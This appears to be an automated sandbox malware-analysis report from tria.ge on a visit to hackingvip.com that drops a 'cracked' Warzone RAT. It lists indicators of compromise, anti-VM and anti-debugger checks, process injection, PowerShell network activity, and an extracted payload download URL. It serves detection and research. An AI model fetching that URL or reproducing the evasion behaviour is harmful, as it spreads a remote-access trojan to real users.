Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
247s -
max time network
250s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250128-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250128-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
31/01/2025, 14:36
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
http://hackingvip.com
Resource
win10ltsc2021-20250128-en
General
-
Target
http://hackingvip.com
Malware Config
Extracted
https://onedrive.live.com/download?cid=C7F050ABA6D0F6B7&resid=C7F050ABA6D0F6B7%21105&authkey=AIPYamsd38clFVs
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 3864 created 3668 3864 WARZONE-RAT 3.03 Cracked.exe 57 PID 2536 created 3668 2536 WARZONE-RAT 3.03 Cracked.exe 57 -
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
-
Warzonerat family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ WARZONE-RAT 3.03 Cracked.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ WARZONE RAT 3.03 Cracked.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ WARZONE-RAT 3.03 Cracked.exe -
Warzone RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x0007000000027ea6-612.dat warzonerat -
Blocklisted process makes network request 6 IoCs
flow pid Process 159 3264 powershell.exe 161 3264 powershell.exe 164 3264 powershell.exe 172 2076 powershell.exe 173 2076 powershell.exe 175 2076 powershell.exe -
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion WARZONE-RAT 3.03 Cracked.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion WARZONE-RAT 3.03 Cracked.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion WARZONE-RAT 3.03 Cracked.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion WARZONE RAT 3.03 Cracked.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion WARZONE RAT 3.03 Cracked.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion WARZONE-RAT 3.03 Cracked.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3933156042-2316999077-2687276773-1000\Control Panel\International\Geo\Nation WARZONE-RAT 3.03 Cracked.exe Key value queried \REGISTRY\USER\S-1-5-21-3933156042-2316999077-2687276773-1000\Control Panel\International\Geo\Nation WARZONE-RAT 3.03 Cracked.exe Key value queried \REGISTRY\USER\S-1-5-21-3933156042-2316999077-2687276773-1000\Control Panel\International\Geo\Nation WARZONE-RAT 3.03 Cracked.exe -
Executes dropped EXE 5 IoCs
pid Process 3864 WARZONE-RAT 3.03 Cracked.exe 5104 WARZONE-RAT 3.03 Cracked.exe 3596 WARZONE RAT 3.03 Cracked.exe 2536 WARZONE-RAT 3.03 Cracked.exe 1264 WARZONE-RAT 3.03 Cracked.exe -
Loads dropped DLL 4 IoCs
pid Process 3596 WARZONE RAT 3.03 Cracked.exe 3596 WARZONE RAT 3.03 Cracked.exe 3596 WARZONE RAT 3.03 Cracked.exe 3596 WARZONE RAT 3.03 Cracked.exe -
resource yara_rule behavioral1/files/0x0007000000027ea8-503.dat themida behavioral1/memory/3864-507-0x0000000000E50000-0x0000000002392000-memory.dmp themida behavioral1/memory/3864-508-0x0000000000E50000-0x0000000002392000-memory.dmp themida behavioral1/files/0x0007000000027ead-524.dat themida behavioral1/memory/3596-604-0x0000000000400000-0x0000000001411000-memory.dmp themida behavioral1/memory/3864-605-0x0000000000E50000-0x0000000002392000-memory.dmp themida behavioral1/memory/3596-608-0x0000000000400000-0x0000000001411000-memory.dmp themida behavioral1/memory/3596-607-0x0000000000400000-0x0000000001411000-memory.dmp themida behavioral1/memory/3596-609-0x0000000000400000-0x0000000001411000-memory.dmp themida behavioral1/memory/3596-614-0x0000000000400000-0x0000000001411000-memory.dmp themida behavioral1/memory/5104-632-0x0000000000E50000-0x0000000002392000-memory.dmp themida behavioral1/memory/3596-657-0x0000000000400000-0x0000000001411000-memory.dmp themida behavioral1/memory/2536-663-0x0000000000E50000-0x0000000002392000-memory.dmp themida behavioral1/memory/2536-664-0x0000000000E50000-0x0000000002392000-memory.dmp themida behavioral1/memory/2536-669-0x0000000000E50000-0x0000000002392000-memory.dmp themida -
Checks whether UAC is enabled 1 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA WARZONE RAT 3.03 Cracked.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA WARZONE-RAT 3.03 Cracked.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA WARZONE-RAT 3.03 Cracked.exe -
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 163 icanhazip.com 164 icanhazip.com 175 icanhazip.com 192 whatismyipaddress.com 193 whatismyipaddress.com 194 whatismyipaddress.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
pid Process 3864 WARZONE-RAT 3.03 Cracked.exe 5104 WARZONE-RAT 3.03 Cracked.exe 5104 WARZONE-RAT 3.03 Cracked.exe 3596 WARZONE RAT 3.03 Cracked.exe 5104 WARZONE-RAT 3.03 Cracked.exe 2536 WARZONE-RAT 3.03 Cracked.exe 1264 WARZONE-RAT 3.03 Cracked.exe 1264 WARZONE-RAT 3.03 Cracked.exe 1264 WARZONE-RAT 3.03 Cracked.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3864 set thread context of 5104 3864 WARZONE-RAT 3.03 Cracked.exe 120 PID 2536 set thread context of 1264 2536 WARZONE-RAT 3.03 Cracked.exe 129 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WARZONE RAT 3.03 Cracked.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ WARZONE-RAT 3.03 Cracked.exe Key created \REGISTRY\USER\S-1-5-21-3933156042-2316999077-2687276773-1000_Classes\Local Settings msedge.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 4344 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 32 IoCs
pid Process 3360 msedge.exe 3360 msedge.exe 1236 msedge.exe 1236 msedge.exe 524 identity_helper.exe 524 identity_helper.exe 2340 msedge.exe 2340 msedge.exe 3544 msedge.exe 3544 msedge.exe 3544 msedge.exe 3544 msedge.exe 5104 WARZONE-RAT 3.03 Cracked.exe 5104 WARZONE-RAT 3.03 Cracked.exe 3264 powershell.exe 3264 powershell.exe 3264 powershell.exe 1264 WARZONE-RAT 3.03 Cracked.exe 1264 WARZONE-RAT 3.03 Cracked.exe 2076 powershell.exe 2076 powershell.exe 2076 powershell.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 23 IoCs
pid Process 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: 33 2896 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 2896 AUDIODG.EXE Token: SeRestorePrivilege 4356 7zG.exe Token: 35 4356 7zG.exe Token: SeSecurityPrivilege 4356 7zG.exe Token: SeSecurityPrivilege 4356 7zG.exe Token: SeRestorePrivilege 2480 7zG.exe Token: 35 2480 7zG.exe Token: SeSecurityPrivilege 2480 7zG.exe Token: SeSecurityPrivilege 2480 7zG.exe Token: SeDebugPrivilege 3264 powershell.exe Token: SeIncreaseQuotaPrivilege 3264 powershell.exe Token: SeSecurityPrivilege 3264 powershell.exe Token: SeTakeOwnershipPrivilege 3264 powershell.exe Token: SeLoadDriverPrivilege 3264 powershell.exe Token: SeSystemProfilePrivilege 3264 powershell.exe Token: SeSystemtimePrivilege 3264 powershell.exe Token: SeProfSingleProcessPrivilege 3264 powershell.exe Token: SeIncBasePriorityPrivilege 3264 powershell.exe Token: SeCreatePagefilePrivilege 3264 powershell.exe Token: SeBackupPrivilege 3264 powershell.exe Token: SeRestorePrivilege 3264 powershell.exe Token: SeShutdownPrivilege 3264 powershell.exe Token: SeDebugPrivilege 3264 powershell.exe Token: SeSystemEnvironmentPrivilege 3264 powershell.exe Token: SeRemoteShutdownPrivilege 3264 powershell.exe Token: SeUndockPrivilege 3264 powershell.exe Token: SeManageVolumePrivilege 3264 powershell.exe Token: 33 3264 powershell.exe Token: 34 3264 powershell.exe Token: 35 3264 powershell.exe Token: 36 3264 powershell.exe Token: SeIncreaseQuotaPrivilege 3264 powershell.exe Token: SeSecurityPrivilege 3264 powershell.exe Token: SeTakeOwnershipPrivilege 3264 powershell.exe Token: SeLoadDriverPrivilege 3264 powershell.exe Token: SeSystemProfilePrivilege 3264 powershell.exe Token: SeSystemtimePrivilege 3264 powershell.exe Token: SeProfSingleProcessPrivilege 3264 powershell.exe Token: SeIncBasePriorityPrivilege 3264 powershell.exe Token: SeCreatePagefilePrivilege 3264 powershell.exe Token: SeBackupPrivilege 3264 powershell.exe Token: SeRestorePrivilege 3264 powershell.exe Token: SeShutdownPrivilege 3264 powershell.exe Token: SeDebugPrivilege 3264 powershell.exe Token: SeSystemEnvironmentPrivilege 3264 powershell.exe Token: SeRemoteShutdownPrivilege 3264 powershell.exe Token: SeUndockPrivilege 3264 powershell.exe Token: SeManageVolumePrivilege 3264 powershell.exe Token: 33 3264 powershell.exe Token: 34 3264 powershell.exe Token: 35 3264 powershell.exe Token: 36 3264 powershell.exe Token: SeIncreaseQuotaPrivilege 3264 powershell.exe Token: SeSecurityPrivilege 3264 powershell.exe Token: SeTakeOwnershipPrivilege 3264 powershell.exe Token: SeLoadDriverPrivilege 3264 powershell.exe Token: SeSystemProfilePrivilege 3264 powershell.exe Token: SeSystemtimePrivilege 3264 powershell.exe Token: SeProfSingleProcessPrivilege 3264 powershell.exe Token: SeIncBasePriorityPrivilege 3264 powershell.exe Token: SeCreatePagefilePrivilege 3264 powershell.exe Token: SeBackupPrivilege 3264 powershell.exe Token: SeRestorePrivilege 3264 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 4356 7zG.exe 2480 7zG.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 3824 taskmgr.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe 1236 msedge.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 5104 WARZONE-RAT 3.03 Cracked.exe 3596 WARZONE RAT 3.03 Cracked.exe 1264 WARZONE-RAT 3.03 Cracked.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1236 wrote to memory of 2044 1236 msedge.exe 83 PID 1236 wrote to memory of 2044 1236 msedge.exe 83 PID 1236 wrote to memory of 1948 1236 msedge.exe 84 PID 1236 wrote to memory of 1948 1236 msedge.exe 84 PID 1236 wrote to memory of 1948 1236 msedge.exe 84 PID 1236 wrote to memory of 1948 1236 msedge.exe 84 PID 1236 wrote to memory of 1948 1236 msedge.exe 84 PID 1236 wrote to memory of 1948 1236 msedge.exe 84 PID 1236 wrote to memory of 1948 1236 msedge.exe 84 PID 1236 wrote to memory of 1948 1236 msedge.exe 84 PID 1236 wrote to memory of 1948 1236 msedge.exe 84 PID 1236 wrote to memory of 1948 1236 msedge.exe 84 PID 1236 wrote to memory of 1948 1236 msedge.exe 84 PID 1236 wrote to memory of 1948 1236 msedge.exe 84 PID 1236 wrote to memory of 1948 1236 msedge.exe 84 PID 1236 wrote to memory of 1948 1236 msedge.exe 84 PID 1236 wrote to memory of 1948 1236 msedge.exe 84 PID 1236 wrote to memory of 1948 1236 msedge.exe 84 PID 1236 wrote to memory of 1948 1236 msedge.exe 84 PID 1236 wrote to memory of 1948 1236 msedge.exe 84 PID 1236 wrote to memory of 1948 1236 msedge.exe 84 PID 1236 wrote to memory of 1948 1236 msedge.exe 84 PID 1236 wrote to memory of 1948 1236 msedge.exe 84 PID 1236 wrote to memory of 1948 1236 msedge.exe 84 PID 1236 wrote to memory of 1948 1236 msedge.exe 84 PID 1236 wrote to memory of 1948 1236 msedge.exe 84 PID 1236 wrote to memory of 1948 1236 msedge.exe 84 PID 1236 wrote to memory of 1948 1236 msedge.exe 84 PID 1236 wrote to memory of 1948 1236 msedge.exe 84 PID 1236 wrote to memory of 1948 1236 msedge.exe 84 PID 1236 wrote to memory of 1948 1236 msedge.exe 84 PID 1236 wrote to memory of 1948 1236 msedge.exe 84 PID 1236 wrote to memory of 1948 1236 msedge.exe 84 PID 1236 wrote to memory of 1948 1236 msedge.exe 84 PID 1236 wrote to memory of 1948 1236 msedge.exe 84 PID 1236 wrote to memory of 1948 1236 msedge.exe 84 PID 1236 wrote to memory of 1948 1236 msedge.exe 84 PID 1236 wrote to memory of 1948 1236 msedge.exe 84 PID 1236 wrote to memory of 1948 1236 msedge.exe 84 PID 1236 wrote to memory of 1948 1236 msedge.exe 84 PID 1236 wrote to memory of 1948 1236 msedge.exe 84 PID 1236 wrote to memory of 1948 1236 msedge.exe 84 PID 1236 wrote to memory of 3360 1236 msedge.exe 85 PID 1236 wrote to memory of 3360 1236 msedge.exe 85 PID 1236 wrote to memory of 216 1236 msedge.exe 86 PID 1236 wrote to memory of 216 1236 msedge.exe 86 PID 1236 wrote to memory of 216 1236 msedge.exe 86 PID 1236 wrote to memory of 216 1236 msedge.exe 86 PID 1236 wrote to memory of 216 1236 msedge.exe 86 PID 1236 wrote to memory of 216 1236 msedge.exe 86 PID 1236 wrote to memory of 216 1236 msedge.exe 86 PID 1236 wrote to memory of 216 1236 msedge.exe 86 PID 1236 wrote to memory of 216 1236 msedge.exe 86 PID 1236 wrote to memory of 216 1236 msedge.exe 86 PID 1236 wrote to memory of 216 1236 msedge.exe 86 PID 1236 wrote to memory of 216 1236 msedge.exe 86 PID 1236 wrote to memory of 216 1236 msedge.exe 86 PID 1236 wrote to memory of 216 1236 msedge.exe 86 PID 1236 wrote to memory of 216 1236 msedge.exe 86 PID 1236 wrote to memory of 216 1236 msedge.exe 86 PID 1236 wrote to memory of 216 1236 msedge.exe 86 PID 1236 wrote to memory of 216 1236 msedge.exe 86 PID 1236 wrote to memory of 216 1236 msedge.exe 86 PID 1236 wrote to memory of 216 1236 msedge.exe 86 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3668
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://hackingvip.com2⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1236 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffa12db46f8,0x7ffa12db4708,0x7ffa12db47183⤵PID:2044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:23⤵PID:1948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
PID:3360
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2948 /prefetch:83⤵PID:216
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:13⤵PID:5024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:13⤵PID:1840
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5516 /prefetch:83⤵PID:1560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5516 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=1976 /prefetch:83⤵PID:1696
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:13⤵PID:1616
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1804 /prefetch:13⤵PID:2876
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:13⤵PID:564
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4048 /prefetch:13⤵PID:4484
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4236 /prefetch:13⤵PID:3624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3656 /prefetch:13⤵PID:1688
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6504 /prefetch:13⤵PID:3596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4248 /prefetch:83⤵PID:3240
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6724 /prefetch:13⤵PID:4388
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6908 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:2340
-
-
